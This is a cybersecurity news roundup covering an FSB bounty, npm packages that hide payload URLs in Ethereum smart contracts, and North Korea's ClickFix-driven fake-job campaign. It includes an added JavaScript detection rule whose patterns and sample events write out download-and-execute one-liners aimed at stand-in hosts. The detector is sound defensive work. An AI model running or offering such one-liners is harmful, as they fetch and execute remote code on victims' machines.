09/05/2025 | Press release | Distributed by Public on 09/05/2025 07:02
The U.S. Department of State has announced a bounty of up to $10 million for information on three Russian Federal Security Service (FSB) officers accused of orchestrating cyberattacks against U.S. critical infrastructure. The officers, Marat Valeryevich Tyukov, Mikhail Mikhailovich Gavrilov, and Pavel Aleksandrovich Akulov, are thought to be linked to FSB's Center 16 (aka Military Unit 71330).
[Image] Source: U.S. Department of Justice
The same trio was also charged in March 2022 for a long-running campaign (2012-2017) that targeted U.S. government agencies, including the Nuclear Regulatory Commission and various energy firms. One such firm, Wolf Creek Nuclear Operating Corporation, operates a nuclear power plant based in Burlington, Kansas. According to the State Department, Tyukov, Gavrilov, and Akulov's operations extended to over 500 foreign energy companies in 135 other countries.
Just a few weeks ago, the FBI warned that the same actors had been exploiting CVE-2018-0171 in outdated Cisco networking devices over the past year. The vulnerability allows attackers to remotely execute code on unpatched systems, which let them breach multiple companies across U.S. critical infrastructure sectors. The networking firm has since released a patch for the flaw and urged network admins to update their devices.
The FSB-linked group has a long history of targeting U.S. state, local, tribal, and aviation entities. Tips can be submitted anonymously via the department's Tor-based Rewards for Justice channel, with the possibility of relocation for informants.
Two newly uncovered malicious npm packages are using Ethereum smart contracts to conceal and deliver malware, highlighting evolving attacker tactics in software supply chain attacks. The packages, colortoolsv2 and mimelib2, were uploaded in July 2025 and later removed.
According to security researchers, once the packages are imported into a project they trigger code that fetches a second-stage payload from attacker-controlled servers. While the packages' malicious functionality is easy to expose on inspection, the GitHub projects that imported them lent them credibility in the eyes of unsuspecting users. What sets this operation apart is its use of Ethereum smart contracts to host the URLs for payload delivery, a method reminiscent of the EtherHiding technique. By leveraging decentralized blockchain infrastructure, attackers can better obscure their command and control (C2) mechanisms and avoid takedowns.
[Image] Smart contract seen on the blockchain (Source: ReversingLabs)
Further investigation has linked the npm packages to a wider campaign involving bogus GitHub repositories disguised as cryptocurrency trading tools, including solana-trading-bot-v2, ethereum-mev-bot-v2, and hyperliquid-trading-bot. These repositories all falsely advertised automated trading capabilities, targeting developers and crypto enthusiasts. The accounts tied to this activity were connected to a distribution-as-a-service (DaaS) cluster dubbed 'Stargazers Ghost Network', known for manipulating repository popularity through fake stars, forks, and commits.
These incidents point to a broader trend: crypto-related supply chain attacks are accelerating and growing more sophisticated. As threat actors weaponize blockchain technology to distribute malware, developers are being urged to go beyond surface metrics when evaluating libraries and to rigorously vet both open-source and third-party code for signs of tampering. Proactive scrutiny, including reviewing not just downloads and commit history but also the credibility of maintainers, remains the first line of defense against malware hidden in trusted repositories.
SentinelLABS and Validin have revealed that North Korea-aligned threat actors behind the Contagious Interview campaign cluster actively monitor cyber threat intelligence (CTI) platforms to track exposure of their infrastructure and scout new assets. The actors operate in coordinated teams, communicating via common enterprise tools like Slack, while drawing on sources such as Validin, VirusTotal, and Maltrail to inform their operations.
Although they recognize their infrastructure is detectable, these actors make only limited modifications to conceal it. Instead, they focus on rapidly deploying new assets following service provider takedowns, maintaining high victim engagement over preserving older infrastructure. This approach reflects both resource constraints and internal incentives, as decentralized teams compete to protect individual assets rather than coordinate large-scale security updates.
Between January and March 2025, SentinelLABS identified more than 230 victims, most of them cryptocurrency professionals, though the actual number is likely higher. Targets are lured through fake job offers using the ClickFix social engineering technique, which manipulates candidates into running malicious commands under the guise of assessments or troubleshooting errors.
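Because ClickFix depends on the victim typing or pasting a command by hand, the resulting process tree is distinctive and can be scored from endpoint telemetry. The following is an added example, not code from SentinelLABS, Validin or the article: a small rule over process-creation events that flags a download-and-execute one-liner launched from an interactive shell or file-manager parent. The event field names (parent, image, cmdline), the scoring weights, the threshold and the sample events are all assumptions constructed for illustration.

```javascript
// Added example: score process-creation events for the ClickFix shape
// (interactive launcher -> shell -> fetch remote content -> execute it).
// Not code from SentinelLABS or the article; field names and weights are assumed.

const INTERACTIVE_PARENTS = new Set(['explorer.exe', 'terminal', 'finder']);
const SHELLS = new Set(['powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe',
                        'bash', 'zsh', 'sh', 'osascript']);
// Command-line fragments that pull content from the network.
const DOWNLOAD = /\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget|certutil\s+-urlcache|mshta\s+https?:)(?!\w)/i;
// Fragments that execute fetched or encoded content.
const EXEC_CHAIN = /(\|\s*(iex|invoke-expression|sh|bash|zsh)\b|\biex\b|-enc(odedcommand)?\s+[A-Za-z0-9+\/=]{20,}|\bosascript\s+-e\b)/i;
// Flags that hide the window or relax policy; weak on their own.
const HIDDEN = /(^|\s)-(w(indowstyle)?\s+hidden|nop\b|noprofile\b|ep\s+bypass|executionpolicy\s+bypass)/i;
const THRESHOLD = 5; // assumed cut-off

function scoreEvent(ev) {
  const reasons = [];
  let score = 0;
  if (INTERACTIVE_PARENTS.has(ev.parent.toLowerCase())) { score += 2; reasons.push('interactive parent'); }
  if (SHELLS.has(ev.image.toLowerCase())) { score += 1; reasons.push('shell image'); }
  if (DOWNLOAD.test(ev.cmdline)) { score += 2; reasons.push('remote download'); }
  if (EXEC_CHAIN.test(ev.cmdline)) { score += 3; reasons.push('execute fetched content'); }
  if (HIDDEN.test(ev.cmdline)) { score += 1; reasons.push('hidden or policy-bypass flags'); }
  return { score, reasons };
}

// Returns only the events at or above THRESHOLD, with their index and reasons.
function flagClickFix(events) {
  return events
    .map((ev, index) => ({ index, ...scoreEvent(ev) }))
    .filter((r) => r.score >= THRESHOLD);
}

// Constructed sample telemetry; hostnames use the reserved .invalid TLD.
const SAMPLE_EVENTS = [
  { parent: 'explorer.exe', image: 'powershell.exe',
    cmdline: 'powershell -w hidden -nop -c "iex (irm https://assessment.example.invalid/fix)"' },
  { parent: 'explorer.exe', image: 'powershell.exe',
    cmdline: 'powershell -File C:\\scripts\\backup.ps1' },
  { parent: 'terminal', image: 'bash',
    cmdline: 'bash -c "curl -fsSL https://node-check.example.invalid/run.sh | bash"' },
  { parent: 'services.exe', image: 'powershell.exe',
    cmdline: 'powershell -ep bypass -File C:\\ProgramData\\agent\\update.ps1' },
  { parent: 'explorer.exe', image: 'mshta.exe',
    cmdline: 'mshta https://assessment.example.invalid/check.hta' },
];

for (const hit of flagClickFix(SAMPLE_EVENTS)) {
  console.log(`event ${hit.index}: score ${hit.score} (${hit.reasons.join(', ')})`);
}
```

The interactive-parent condition is what separates this from ordinary scripted automation: the fourth sample uses a policy-bypass flag but is launched by a service and scores low, while the hand-run one-liners from a file manager or terminal cross the threshold. Tune the parent list and threshold to the telemetry source actually in use.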
[Image] Contagious Interview victimology (Source: SentinelLABS)
Accompanying reporting by Reuters highlights how these scams have become common in the crypto industry. Interviews with victims, including developers, consultants, and executives, confirmed the sophistication of the fraudulent offers as well as the financial losses suffered. The reporting humanizes the impact and the breadth of the campaign, showing how Pyongyang-backed actors exploit trust and professional networks to steal digital assets.
Effective mitigation requires vigilance from job seekers, especially those in the cryptocurrency sector, alongside proactive disruption of malicious infrastructure by service providers. Close collaboration, intelligence-sharing, and media exposure are also essential in reducing the reach and impact of these campaigns.